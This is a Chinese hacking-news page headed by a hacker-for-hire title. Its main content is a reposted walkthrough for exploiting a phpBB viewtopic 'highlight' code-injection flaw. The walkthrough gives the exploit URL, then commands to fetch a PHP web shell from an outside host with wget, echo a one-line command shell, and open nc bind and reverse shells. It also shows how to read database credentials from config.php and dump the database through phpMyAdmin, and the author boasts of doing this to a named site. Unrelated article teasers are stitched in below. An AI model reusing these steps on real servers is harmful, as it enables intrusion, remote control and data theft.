找黑客一般费用是多少 *** 找黑客暗语

访客4年前黑客资讯1041

文章作者:作者:ik www.zuso.org 2. 漏洞名称:phpBB viewtopic highlight= 漏洞 3. 编写前言:虽然这个漏洞出了有一段时间, 但是到现在还是许多使用者没有更新.最近更是新出了phpBB2.x&PHP4.3.x unserialize函数内存泄露漏洞.但是很多朋友拿到了数据库密码和文件目录却不知道如何使用.颜颜也说没有看过针对phpbb run on unix like system 的应用文章, 我想刚好, 就把一些应用跟思路写了出来.两个漏洞不一样,但是思路我想还是可以借鉴的.呵, 废话不多说了, 漏洞是天天有新的,最主要的是你的思路. 4. 漏洞用法:http://www.xxxx.com/phpBB2/viewtopic.php?t=1&highlight=%2527%252esystem(CMD)%252e%2527CMD=指令 用 ascii code 编码, like chr(108)%252echr(115) 即为 ls 的意思!更多 ascii code 请参考 http://www.asciitable.com/ , 这边不多介绍啰 :p 5. 我的思路:一般发现论坛有问题之后, 我的之一步会是先检查他的权限, 以及我是否有足够权限写入! 用 'id' 会看到你现在的身分! 一般 apache 预设都是 nobody 或者 www !来寻找可以写入的地方吧 'ls -laR' 一般在 ~path/files/ 下面可以写入...试试看!嗯, 再来检查 wget 是否存在, 'ls -la /usr/local/bin' 看看有没有 wget...如果有, 我的下一步就是 'wget -O ~path/files/ik.php http://www.xfocus.net/tools/200405/PhpShell.php'(希望可以写入呀, X客中国那次就是这样玩的!) 成功的话直接在 ~path/files 目录下就可以执行 ik.php 了!但, 又有问题了, 如果在 bin 下面找不到 wget 怎办? 那就用 echo 吧! (总不会连 echo 最基本的都没吧=_+)丢一个最小的 php shell 吧! 'echo "<? system(\$_REQUEST['cmd']); ?>" > ~path/files/ik.php' ! 若能写入就成功了!用法就是 'http://www.xxx.com/phpBB2/ik.php?cmd=指令' ! 那... 如果都不能写入怎办!? 就此放弃吗? 想太多!试试看 nc 吧! 把他 bind 一个 port 出来 'nc -l -p 5555 -e /bin/sh' 然后我在 'telnet targetIP 5555' ! 成功的话就进去了!什么!? 他在 router (IP Share 后面怎办!?) 那就让他自己连回来吧, 先在我的 linux box 上面 'nc -l 6666' 开始监听!在目标上面再执行 'nc myIP 6666 -e /bin/sh', 如果成功的话, 我的这边就成功取得 shell 了!那... 如果以上 *** 都不行怎办!? 总不能就此放弃吧!? 因为是 php 使我不得不想到 phpmyAdmin 呀!来看看他的 config.php 档吧, 黑不掉首页 拿不到权限, 资料库总该借瞄一下吧!? 瞄不到, 密码也该借一下吧!?这个写着 MySQL 连线资讯的档案, 大家应该都会用猫 (cat) 去看! 但有的时候, cat 并不能使用, 该怎办呢? 找找其他指令吧, 我会用 more config.php 试试, 接着 tail -f config.php 等等! 基本上都可以用的! 若没有该指令就换下一个!得到这份密码, 令我想到更多事情可以玩, 我会先 'locate phpmyadmin' 'locate phpadmin' 找出有没有 phpmyadmin!如果有, 就连到 ~path/phpmyadmin 然后用那组帐号密码进去帮他备分一下阿, 做人要厚道, 黑他之前也要备份一下哩 :p就像那次我黑 X客中国 就是如此, 将近 500mb 的资料库从中国抓到美国= =

相关文章

女主带黑客儿子前夫总裁(霸道总裁儿子是黑客的小说)

女主带黑客儿子前夫总裁(霸道总裁儿子是黑客的小说)

本文导读目录: 1、男主是黑道总裁,女主不明不白和男主生下了一孩子,孩子是个天才,也是个黑客,男女主多年后重逢相爱 2、找小说名,女主的儿子是电脑黑客,儿子的网名好像是妈妈最大,爸爸是腹黑总裁,妈...

希腊多地学校因寒冷天余光文气停课 学生将接受远程授

  中新网1月19日电 据希腊《中希时报》19日报道,受恶劣天气影响,希腊部分地区的降雪及寒冷天气仍在继续。许多学校也因此关闭,课程则通过远程教育的方式教授。   报道称,在阿提卡大区,奥罗博斯市及...

电脑被黑客入侵了握手(被黑客入侵的电脑)

电脑被黑客入侵了握手(被黑客入侵的电脑)

本文导读目录: 1、我的电脑被黑客攻击了怎么办? 2、电脑被黑客攻击了。怎么处理 3、电脑被黑客入侵了怎么办 4、电脑被黑客侵入后会出现哪些现象? 5、电脑被黑客入侵怎么办 6、我...

黑客网站免费刷q币软件下载,网络上的黑客能查到别人的信息吗,电脑桌面被被黑客设置了

server已经由PHP(codeigner)进行了编码。 你需求将该运用程序安装到预先供给的环境中,你可以在线或在本地主机上运用它。 用户可以自在选择。 也欢迎你为增强功用做出奉献。 System...

洗衣店的干洗耗材是什么(常见的干洗耗材有哪些)

双氧水 1;双氧水又叫过氧化氢,无色透明液体,它有强烈的氧化性,它有分工业双氧水,医用双氧水,食品双氧水,我们洗衣店用的一般都是工业双氧水,浓度达到百分之三十左右的。一般的化工店都可以采购得到。化工...

神级黑客(神级黑客在都市)

神级黑客(神级黑客在都市)

本文导读目录: 1、曾经大名鼎鼎的黑客现在都在做什么? 2、DNF绑定了手机令牌还被盗? 3、史上最厉害的黑客是谁? 4、神级黑客究竟能逆天到什么程度 5、勒索病毒全球都是,各国神级黑...